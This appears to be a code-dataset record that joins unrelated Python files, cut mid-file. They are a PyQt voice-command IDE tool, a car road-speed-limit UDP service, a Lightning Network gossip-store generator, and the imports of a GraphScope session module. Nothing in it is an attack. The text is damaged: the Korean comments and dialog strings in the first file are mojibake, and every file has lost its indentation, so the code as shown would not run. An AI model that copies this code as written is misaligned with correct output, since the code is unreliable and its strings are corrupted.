self.sub1.close()
if self.sub2 is not None:
self.sub2.close()
if not self.help_flag:
self.help_dialog.close()
keyboard.unhook_all()
super().close()
def soundIn(self):
word=self.q.get()
self.vLabel.setText(word)
# ์์ window๊ฐ ์๋ ์์ ์์๋ ๋ช
๋ น ๋ฌด์ํ๋๋ก ์กฐ์น
if self.sub1 != None:
return
if self.activeWindow.text() == 'others':
if USRLIB.SetForegroundWindow(self.hIdeWnd)==0:
QMessageBox.about(self, "์ค๋ฅ", "IDE๊ฐ ๊ฐ์ง๋์ง ์์์ต๋๋ค.")
return
else:
time.sleep(0.1)
kComm.ideUP(self.activeWindow.text())
else:
kComm.ideUP(self.activeWindow.text())
if self.language_change: # ํ๊ตญ์ด
word2=kComm.matchK(word)
self.vLabel.setText(word+'->'+word2)
if word2 in self.kCommands: # ๋ชจ๋ ์ ํ
self.kCommands[word2](0)
return
elif word2 in kComm.builtInCommands: # ์ผ๋ฐ ๋ช
๋ น์ด
guide=kComm.execute(word2)
self.vLabel.setText(word2+guide)
elif word2 in kComm.customCommands:
kComm.execute(word2)
else: # ์ ์ฌ๋
QMessageBox.about(self, "์ค๋ฅ", "ํด๋น ๋ช
๋ น์ด๊ฐ ์์ต๋๋ค.")
return
else: # peek or seek
makeTree.scanNgc()
sel1=makeTree.POOL.soundIn(word)
# sel1 ์ค ํ๋๋ฅผ ์ ํํ๋ ๋ํ์์ ๋์ฐ๊ณ ๊ฒฐ๊ณผ sel2์ ์ ์ฅ
if len(sel1)==0:
QMessageBox.about(self, "์ค๋ฅ", "๊ฒฐ๊ณผ๋ฅผ ์ฐพ์ ์ ์์ต๋๋ค.\n์ ํํ ๋ฐ์์ผ๋ก ๋ค์ ์๋ํด ์ฃผ์ธ์.")
return
if len(sel1)==1:
sel2=sel1[0]
else:
self.sub1=v_dialog(sel1)
self.sub1.exec_()
try:
sel2=self.sub1.select_fn.text()
except AttributeError: # ์ ํํ์ง ์์
self.sub1=None
return
finally:
self.sub1=None
# ๋จ sel1์ ๊ฒฐ๊ณผ๊ฐ 1๊ฐ๋ผ๋ฉด ์๋ต
sel3=makeTree.POOL[sel2]
if type(sel3[0]) is not list: # ๊ฒฐ๊ณผ 1๊ฐ. len 6์ด๋ฉด ํจ์, 4๋ฉด ํด๋์ค, 1์ด๋ฉด ํ์ผ
sel4=sel3
else: # ํ์ผ, ํด๋์ค, ํจ์ ์ค ์๋ ์ ํ์ง ๋ณด์ฌ์ค
# ๊ฐํน ์ ํ์ง ํ๋์ผ ๋ ์ด ์ง์ ์ ์์ ์ค๋ฅ๊ฐ ๋ฐ์ํ๊ธฐ๋ ํจ, ํด๊ฒฐ ํ์
self.sub1=fn_dialog(sel3)
self.sub1.exec_()
try:
sel4=self.sub1.select_fn
sel4=sel3[sel4[0]][sel4[1]]
except IndexError:
self.sub1=None
return
finally:
self.sub1=None
if self.vMode==1: # seek
kComm.opn(sel4)
pass
elif self.vMode==2: # peek
if self.sub2 != None:
self.sub2.close()
self.sub2=PeekerWindow(sel4, self)
self.sub2.show()
def fileopen(self): #์๋ก์ด ํ์ผ ์ ํ
option = QFileDialog.Option()
option |= QFileDialog.ShowDirsOnly
filename = QFileDialog.getExistingDirectory(self,"select Directory")
if len(filename)>0:
filename='\\'.join(filename.split('/'))
self.topDirectory.setText(filename)
makeTree.setTop(filename)
if not self.ctx.is_alive():
self.ctx.start()
def help(self):
HelpWindow(self)
def macro(self):
MacroWindow(self)
class ComList(QDialog):
def __init__(self, cx, cy):
super().__init__()
self.setMinimumWidth(250)
self.setMaximumSize(250,350)
monitor_y=QDesktopWidget().availableGeometry().height()
if (cy + 225 + 350) > monitor_y:
self.move(cx, cy - 400)
else:
self.move(cx, cy + 160)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.roundener=Roundener(self)
bic=list(kComm.builtInCommands)
half=len(bic)//2
col1='\n'.join(bic[:half])
col2='\n'.join(bic[half:])
layout = QtWidgets.QHBoxLayout(self)
layout.addWidget(QtWidgets.QLabel(col1, self))
layout.addWidget(QtWidgets.QLabel(col2, self))
def paintEvent(self, a0):
self.roundener.paintEvent(a0)
def resizeWindow(self):
if self.help_flag:
self.help_btn.setText('โ')
self.help_flag = False
self.help_dialog = self.ComList(self.x(), self.y())
self.help_dialog.setWindowTitle('Help word')
self.help_dialog.setMaximumSize(250, 350)
self.help_dialog.show()
else:
self.help_btn.setText('โ')
self.help_flag = True
self.help_dialog.close()
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
app = QApplication(sys.argv)
myWindow = MyApp()
myWindow.show()
app.exec_()
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
road_speed_limiter.py | import json
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp
from common.realtime import sec_since_boot
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.setDaemon(True)
broadcast.start()
#gps = Thread(target=self.gps_thread, args=[])
#gps.setDaemon(True)
#gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
roadLimitSpeed.send(dat.to_bytes())
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.start_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, CS, v_cruise_speed):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
section_left_dist = self.roadLimitSpeed.sectionLeftDist
if is_highway is not None:
if is_highway:
MIN_LIMIT = 40
MAX_LIMIT = 120
else:
MIN_LIMIT = 30
MAX_LIMIT = 100
else:
MIN_LIMIT = 30
MAX_LIMIT = 120
# log = "RECV: " + str(is_highway)
# log += ", " + str(cam_limit_speed)
# log += ", " + str(cam_limit_speed_left_dist)
# log += ", " + str(section_limit_speed)
# log += ", " + str(section_left_dist)
v_ego = CS.clu11["CF_Clu_Vanz"] / 3.6
if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
diff_speed = v_ego * 3.6 - cam_limit_speed
if self.longcontrol:
sec = interp(diff_speed, [10., 30.], [13., 18.])
else:
sec = interp(diff_speed, [10., 30.], [15., 20.])
if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
if not self.slowing_down:
self.start_dist = cam_limit_speed_left_dist * 1.2
self.slowing_down = True
first_started = True
else:
first_started = False
base = self.start_dist / 1.2 * 0.65
td = self.start_dist - base
d = cam_limit_speed_left_dist - base
if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
pp = d / td
else:
pp = 0
return cam_limit_speed * CAMERA_SPEED_FACTOR + int(
pp * diff_speed), cam_limit_speed, cam_limit_speed_left_dist, first_started, log
self.slowing_down = False
return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log
elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
if not self.slowing_down:
self.slowing_down = True
first_started = True
else:
first_started = False
return section_limit_speed * CAMERA_SPEED_FACTOR, section_limit_speed, section_left_dist, first_started, log
self.slowing_down = False
return 0, section_limit_speed, section_left_dist, False, log
except Exception as e:
log = "Ex: " + str(e)
pass
self.slowing_down = False
return 0, 0, 0, False, log
road_speed_limiter = None
def road_speed_limiter_get_active():
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_active()
def road_speed_limiter_get_max_speed(CS, v_cruise_speed):
global road_speed_limiter
if road_speed_limiter is None:
road_speed_limiter = RoadSpeedLimiter()
return road_speed_limiter.get_max_speed(CS, v_cruise_speed)
if __name__ == "__main__":
main() |
gossip.py | import os
from common import utility, crypto
import hashlib
import time
from copy import deepcopy
from multiprocessing import Process, Lock
def gossip(config, network, gossipSequence):
"""
creates and writes all gossip from the files nodeSaveFile and channelSaveFile defined in config
Writes this information to gossipSaveFile
Each channel has 1 channel annoucement and 2 channel updates. Keys and scids are determined determinisically based on node id.
"""
utility.setRandSeed(config.randSeed)
for n in network.getNodes():
n.channels = []
initGossip(config.gossipFile, config.scidSatoshisFile, len(network.channels), config.gossipStore)
t2 = time.time()
generateAllGossip(network, gossipSequence, config.gossipFile, config.scidSatoshisFile, config.writeNodes, config.processNum, config.gossipStore)
t3 = time.time()
print("generating/writing gossip complete", t3-t2)
return network
def generateAllGossip(network, rawGossipSequence, gossipFile, scidFile, writeNodes, processNum, gossipStore):
"""
generates and writes all gossip.
First use the gossipSequence generated in buildNetwork.py and stored in channelStoreFile to seperate channels into lists of channels
Second, based on thread count, create lists of channel allocators called tindex which helps with load balancing. A sequence of channels is called a bundle.
Bundles will be assigned to each process.
Last, we make a group of processes running genGossip
"""
channels = network.channels
network.fullConnNodes.sort(key=utility.sortByNodeId, reverse=False)
nodes = network.getNodes()
gossipSequence = []
for bound in rawGossipSequence:
i = bound[0]
bound = bound[1]
gossipSequence += [(nodes[i], channels[bound[0]:bound[1]])]
#if processNum is 5, we allocate seq1 to t1, seq2 to t2 ... seq5 to t5.
#Then we set t2 as first, so seq6 to t2, seq7 to t3, seq10 to t1
#This is a greedy way to get fairly equal load balancing.
tindex = [[] for i in range(0, processNum)]
for i in range(0, processNum):
tindex[0] += [i]
for i in range(1, processNum):
tindex[i] = [tindex[i - 1][-1]] + tindex[i - 1][0:-1]
bundles = [[] for i in range(0, processNum)]
i = 0
j = 0
for b in range(0, len(gossipSequence)):
gs = gossipSequence[b]
ti = tindex[i][j]
bundles[ti] += [gs]
if j == processNum-1:
i += 1
j += 1
i = i % processNum
j = j % processNum
pList = []
l = Lock()
for i in range(0, processNum):
p = Process(target=genGossip, args=(bundles[i], gossipFile, scidFile, gossipStore, writeNodes, l))
p.start()
pList += [p]
for i in range(0, processNum):
pList[i].join()
def genGossip(bundles, gossipFile, scidFile, gossipStore, writeNodes, l):
"""
Given bundles, we create annoucements and updates for each channel in each bundle
Since key generation is pricey because of CBitcoinSecret objects, we save the keys so that they can be used again any other time that key is encountered in the process
:param: bundles: list of channel lists
"""
w = 0
pList = []
writeList = []
for bundle in bundles:
genNode = bundle[0]
channels = bundle[1]
if not genNode.hasKeys:
crypto.makeKeyOnDemand(genNode)
for channel in channels:
bscid = channel.scid.serialize()
ivalue = channel.value
node1 = channel.node1
node2 = channel.node2
if node1 == genNode:
otherNode = node2
else:
otherNode = node1
if not otherNode.hasKeys:
crypto.makeKeyOnDemand(otherNode)
a = createChannelAnnouncement(channel, bscid)
u1, u2 = createChannelUpdates(channel, a, btimestamp, bscid, ivalue)
ba = a.serialize(full=True)
bu1 = u1.serialize(full=True)
bu2 = u2.serialize(full=True)
bn1 = None
bn2 = None
if channel.n1Write and writeNodes:
n1 = createNodeAnnouncment(node1)
bn1 = n1.serialize(full=True)
if channel.n2Write and writeNodes:
n2 = createNodeAnnouncment(node2)
bn2 = n2.serialize(full=True)
writeList += [((ba, channel.scid, ivalue), (bu1, bu2), (bn1, bn2))]
#write every x number of channels
if w == 10000:
p = Process(target=writeProcess, args=(writeList, gossipFile, scidFile, gossipStore, l))
pList += [p]
p.start()
writeList = []
w = 0
w += 1
p = Process(target=writeProcess, args=(writeList,gossipFile,scidFile, gossipStore, l))
pList += [p]
p.start()
for p in pList:
p.join()
#annoucement creation
chainHash = bytearray.fromhex('06226e46111a0b59caaf126043eb5bbf28c34f3a5e332a1fc7b2b73cf188910f')
channelType = bytearray().fromhex("0100") #256
featureLen = bytearray().fromhex("0000")
features = bytearray()
GOSSIP_CHANNEL_ANNOUNCEMENT = "announcement"
GOSSIP_CHANNEL_UPDATE = "update"
def createChannelAnnouncement(channel, scid):
"""
create a channel announcement
:param channel: network classes channel obj
:return: announcement
"""
nodeA = channel.node1
nodeB = channel.node2
if nodeA.nodeCompPub < nodeB.nodeCompPub: #in bolt 7, node_id_1 is the pubkey that is "numerically-lesser" of the two
node1 = nodeA
node2 = nodeB
else:
node1 = nodeB
node2 = nodeA
a = ChannelAnnouncement()
a.setFeatureLen(featureLen)
a.setFeatures(features)
a.setscid(scid)
a.setNodeid1(node1.nodeCompPub)
a.setNodeid2(node2.nodeCompPub)
a.setBitcoinKey1(node1.bitcoinCompPub)
a.setBitcoinKey2(node2.bitcoinCompPub)
h = a.hashPartial()
nodesig1 = bytearray(crypto.sign(node1.nodeCPrivObj, h))
nodesig2 = bytearray(crypto.sign(node2.nodeCPrivObj, h))
bitcoinSig1 = bytearray(crypto.sign(node1.bitcoinCPrivObj, h))
bitcoinSig2 = bytearray(crypto.sign(node2.bitcoinCPrivObj, h))
a.setNodeSig1(nodesig1)
a.setNodeSig2(nodesig2)
a.setBitcoinSig1(bitcoinSig1)
a.setBitcoinSig2(bitcoinSig2)
return a
#update fields
updateType = bytearray().fromhex("0102") #258
initialTimestamp = int(time.time())
btimestamp = bytearray(initialTimestamp.to_bytes(4, byteorder="big"))
cltvDelta = 10
cltvDelta = bytearray(cltvDelta.to_bytes(2, byteorder="big"))
htlcMSat = 10000
htlcMSat = bytearray(htlcMSat.to_bytes(8, byteorder="big"))
feeBaseMSat = 1000
feeBaseMSat = bytearray(feeBaseMSat.to_bytes(4, byteorder="big"))
feePropMill = 1000
feePropMill = bytearray(feePropMill.to_bytes(4, byteorder="big"))
def createChannelUpdates(channel, a, timestamp, scid, value):
"""
create channel updates for node1 and node2 in a channel
:param channel: network classes channel obj
:param a: announcement
:return: updates for node 1 and node 2
"""
node1 = channel.node1
node2 = channel.node2
# #channel updates
u = ChannelUpdate()
u.setscid(scid)
u.setTimestamp(timestamp)
u.setcltv(cltvDelta)
u.setHTLCMSat(htlcMSat)
u.setFeeBaseMSat(feeBaseMSat)
u.setFeePropMill(feePropMill)
u1 = createChannelUpdate(channel, node1, deepcopy(u), a)
u2 = createChannelUpdate(channel, node2, deepcopy(u), a)
return u1, u2
def createChannelUpdate(channel, node, u, a):
"""
create one channel update
:param channel: network classes channel obj
:param node: network classes node obj
:param u: incomplete update
:param a: announcement
:return: complete update
"""
mFlags = ""
cFlags = ""
if node.nodeCompPub == a.id1:
mFlags = "00"
cFlags = "00"
elif node.nodeCompPub == a.id2:
mFlags = "00"
cFlags = "01"
u.setmFlags(bytearray().fromhex(mFlags))
u.setcFlags(bytearray().fromhex(cFlags))
# update for node 1
s1 = crypto.sign(node.nodeCPrivObj, u.hashPartial())
u.setSig(s1)
return u
nodeType = bytearray().fromhex("0101") #257
RGBColor = 0 # <--very boring color
bRGBColor = bytearray(RGBColor.to_bytes(3, "big"))
addrLen = 7
bAddrLen = addrLen.to_bytes(2, "big")
b1Addresses = bytearray([1])
loopback = bytearray([127,0,0,1,0,42]) # a loopback addr port 127.0.0.1:42 for fun!
bAddresses = b1Addresses + loopback
def createNodeAnnouncment(node):
"""
make new node announcement for node
:param node: node obj
:return: node announcement obj
"""
n = NodeAnnouncment()
n.setTimestamp(btimestamp)
n.setNodeid(node.nodeCompPub)
n.setRGBColor(bRGBColor)
# set alias as nodeid in ascii
alias = str(node.nodeid)
zeros = 32 - len(alias)
zero = "".join(["0" for i in range(0, zeros)])
alias = zero + alias
n.setAlias(bytearray(alias.encode("utf-8")))
if node.addrType is not None:
if node.addrType == "ipv4":
bType = bytearray([1])
elif node.addrType == "ipv6":
bType = bytearray([2])
elif node.addrType == "torv2":
bType = bytearray([3])
elif node.addrType == "torv3":
bType = bytearray([4])
else:
raise ValueError("addr type is not on of the following: ipv4, ipv6, torv2, or torv3, or None")
try:
bAddresses = bType + node.addrList[0]
except:
raise ValueError
iAddrLen = len(bAddresses)
bAddrLen = iAddrLen.to_bytes(2, "big")
else:
iAddrLen = 0
bAddrLen = iAddrLen.to_bytes(2, "big")
bAddresses = bytearray()
n.setAddrLen(bAddrLen)
n.setAddresses(bAddresses)
h = n.hashPartial()
sig = bytearray(crypto.sign(node.nodeCPrivObj, h))
n.setNodeSig(sig)
return n
#writing functions
def initGossip(gossipFile, scidSatoshiFile, channelNum, gossipStore):
"""
initialze gosip store by making a new one and writing gossip store version (3)
:param filename: gossip_store filename
"""
if os.path.exists(gossipFile):
os.remove(gossipFile) # delete current generate store if it exists
fp = open(gossipFile, "wb")
if gossipStore:
gossipVersion = bytearray().fromhex("03")
fp.write(gossipVersion)
fp.close()
if os.path.exists(scidSatoshiFile):
os.remove(scidSatoshiFile) # delete current generate store if it exists
with open(scidSatoshiFile, "a") as fp:
fp.write(str(channelNum) + "\n")
fp.write("scid ,satoshis\n")
def writeProcess(writeList, gossipFile, scidSatoshisFile, gossipStore, l):
"""
open file, write a single channel paired with 2 updates to the gossip_store. use a lock to stop race conditions with writing to file.
:param: ba: serialized channel annoucement
:param: bu1: serialized channel update
:param: bu2: serialized channel update
"""
l.acquire(block=True)
for g in writeList:
ca = g[0]
bu1 = g[1][0]
bu2 = g[1][1]
bn1 = g[2][0]
bn2 = g[2][1]
if ca != None:
ba = ca[0]
scid = ca[1]
iValue = int(ca[2])
writeScidSatoshi(scid, iValue, scidSatoshisFile)
writeChannelAnnouncement(ba, bSatoshis, gossipFile, gossipStore)
if bu1 != None:
writeChannelUpdate(bu1, gossipFile, gossipStore)
if bu2 != None:
writeChannelUpdate(bu2, gossipFile, gossipStore)
if bn1 != None:
writeNodeAnnouncement(bn1, gossipFile)
if bn2 != None:
writeNodeAnnouncement(bn2, gossipFile)
l.release()
return
#node fields
msglenN = 149
bMsglenN = bytearray(msglenN.to_bytes(2, byteorder="big"))
#channel fields
satoshis = 10000000 # 1 btc
msglenA = 432
bMsglenA = bytearray(msglenA.to_bytes(2, byteorder="big"))
bSatoshis = bytearray(satoshis.to_bytes(8, byteorder="big"))
WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT = bytearray().fromhex("1000")
fulllenA = len(WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT) + len(bMsglenA) + msglenA + len(bSatoshis) # remember, we don't have checksum and we don't count gossipVersion
bMsglenAFull = bytearray(fulllenA.to_bytes(4, byteorder="big"))
halfWriteA = bMsglenAFull + WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT + bMsglenA
#update fields
msglenU = 130
bMsglenU = bytearray(msglenU.to_bytes(2, byteorder="big"))
WIRE_GOSSIP_STORE_CHANNEL_UPDATE = bytearray().fromhex("1001")
fulllenU = len(WIRE_GOSSIP_STORE_CHANNEL_UPDATE) + len(bMsglenU) + msglenU # remember, we don't have checksum and we don't count gossipVersion
bMsglenUFull = bytearray(fulllenU.to_bytes(4, byteorder="big"))
halfWriteU = bMsglenUFull + WIRE_GOSSIP_STORE_CHANNEL_UPDATE + bMsglenU
def writeChannelAnnouncement(ba, bValue, fp, fullGossipStoreFlag):
"""
write channel announcement
:param a: announcement serialized
:param fp: file pointer
:return: serialized gossip msg
"""
with open(fp, "ab") as fp:
if fullGossipStoreFlag:
fp.write(halfWriteA)
else:
fp.write(bMsglenA)
fp.write(ba)
if fullGossipStoreFlag:
fp.write(bValue)
def writeChannelUpdate(u, fp, fullGossipStoreFlag):
"""
write channel update
:param u: update serialized
:param fp: file pointer
:return: serialized gossip msg
"""
with open(fp, "ab") as fp:
if fullGossipStoreFlag:
fp.write(halfWriteU)
else:
fp.write(bMsglenU)
fp.write(u)
def writeScidSatoshi(scid, iValue, scidsatoshisFile):
with open(scidsatoshisFile, "a") as fp:
fp.write(str(scid.height)+"x"+str(scid.tx)+"x"+str(scid.output)+" ,"+str(iValue)+"\n")
WIRE_GOSSIP_STORE_CHANNEL_ANNOUNCEMENT = bytearray().fromhex("1000")
def writeNodeAnnouncement(bn, fp):
"""
write channel update
:param u: update serialized
:param fp: file pointer
:return: serialized gossip msg
"""
with open(fp, "ab") as fp:
nlen = len(bn)
fp.write(bytearray(nlen.to_bytes(2, "big")))
fp.write(bn)
#classes
class ChannelUpdate():
"""
Channel update class
"""
def __init__(self):
self.HTLCMaxMSat = bytearray() #since is it optional it starts out as empty
def setSig(self, sig):
self.sig = sig
def setscid(self, scid):
self.scid = scid
def setTimestamp(self,t):
self.timestamp = t
def setmFlags(self,f):
self.mFlags = f
def setcFlags(self, f):
self.cFlags = f
def setcltv(self, cltv):
self.cltv = cltv
def setHTLCMSat(self, msat):
self.HTLCMSat = msat
def setFeeBaseMSat(self, msat):
self.feeBaseMSat = msat
def setFeePropMill(self, fee):
self.feePropMill = fee
def setHTLCMaxMSat(self, msat): #optional
self.HTLCMaxMSat = msat
def serialize(self, full):
if not full:
return chainHash + self.scid + self.timestamp + self.mFlags + \
self.cFlags + self.cltv + self.HTLCMSat + self.feeBaseMSat + \
self.feePropMill + self.HTLCMaxMSat
else:
return updateType + self.sig + chainHash + self.scid + self.timestamp + self.mFlags + \
self.cFlags + self.cltv + self.HTLCMSat + self.feeBaseMSat + \
self.feePropMill + self.HTLCMaxMSat
def hashPartial(self):
# we take the double sha
p = self.serialize(False)
h = hashlib.sha256(p).digest()
hh = hashlib.sha256(h).digest()
return hh
class ChannelAnnouncement():
"""
Channel Announcement class
"""
def setNodeSig1(self, sig):
self.sig1 = sig
def setNodeSig2(self, sig):
self.sig2 = sig
def setBitcoinSig1(self, sig):
self.bitcoinSig1 = sig
def setBitcoinSig2(self, sig):
self.bitcoinSig2 = sig
def setFeatureLen(self, lenth):
self.featureLen = lenth
def setFeatures(self, f):
self.features = f
def setscid(self, scid):
self.scid = scid
def setNodeid1(self, id1):
self.id1 = id1
def setNodeid2(self, id2):
self.id2 = id2
def setBitcoinKey1(self, bitcoinKey1):
self.bitcoinKey1 = bitcoinKey1
def setBitcoinKey2(self, bitcoinKey2):
self.bitcoinKey2 = bitcoinKey2
def serialize(self, full):
if not full:
a = self.featureLen + self.features + chainHash + self.scid + self.id1 + self.id2 + self.bitcoinKey1 + self.bitcoinKey2
else:
a = channelType + self.sig1 + self.sig2 + self.bitcoinSig1 + self.bitcoinSig2 + self.featureLen + \
self.features + chainHash + self.scid + self.id1 + self.id2 + self.bitcoinKey1 + self.bitcoinKey2
return a
def hashPartial(self):
"""
hash partial announcement
:return: hash digest in python bytes type
"""
a = self.serialize(False)
h = hashlib.sha256(a).digest()
hh = hashlib.sha256(h).digest()
return hh
def printAnnouncement(self, full):
"""
printAnnouncement information
:param: if full annoucement or partial announcement
"""
if not full:
print("len:", self.featureLen.hex())
print("features", self.features.hex())
print("chain hash",chainHash.hex())
print("scid", self.scid.hex())
print("id1:", self.id1.hex())
print("id2:", self.id2.hex())
print("bitcoinKey1", self.bitcoinKey1.hex())
print("bitcoinKey2", self.bitcoinKey2.hex())
else:
print("sig 1", self.sig1.hex())
print("sig 2", self.sig2.hex())
print("bitcoinSig1", self.bitcoinSig1.hex())
print("bitcoinSig2", self.bitcoinSig2.hex())
print("len:", self.featureLen.hex())
print("features", self.features.hex())
print("chain hash",chainHash.hex())
print("scid", self.scid.hex())
print("id1:", self.id1.hex())
print("id2:", self.id2.hex())
print("bitcoinKey1", self.bitcoinKey1.hex())
print("bitcoinKey2", self.bitcoinKey2.hex())
class NodeAnnouncment:
def __init__(self):
zero = 0
self.setFLen(bytearray(zero.to_bytes(2, "big"))) #starts as 0 features. Functions have to set actual features manually
self.setFeatures(bytearray())
def setNodeSig(self, sig):
self.sig = sig
def setFLen(self, flen):
self.flen = flen
def setFeatures(self, features):
self.features = features
def setTimestamp(self, timestamp):
self.timestamp = timestamp
def setNodeid(self, id1):
self.id = id1
def setRGBColor(self, color):
self.color = color
def setAlias(self, alias):
self.alias = alias
def setAddrLen(self, addrLen):
self.addrLen = addrLen
def setAddresses(self, addresses):
self.addresses = addresses
def addressListToBytes(self, addresses):
#TODO may not need
if len(addresses) == 0:
return bytearray()
else:
addrs = bytearray()
for a in addresses:
addrs += a
def hashPartial(self):
"""
hash partial announcement
:return: hash digest in python bytes type
"""
a = self.serialize(False)
h = hashlib.sha256(a).digest()
hh = hashlib.sha256(h).digest()
return hh
def serialize(self, full):
if not full:
n = self.flen + self.features + self.timestamp + self.id + self.color + self.alias + self.addrLen + self.addresses
else:
n = nodeType + self.sig + self.flen + self.features + self.timestamp + self.id + self.color + self.alias + self.addrLen + self.addresses
return n
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import copy
import json
import logging
import os
import pickle
import random
import sys
import threading
import time
import warnings
from queue import Empty as EmptyQueue
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.dag import Dag
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.framework.errors import InteractiveEngineInternalError
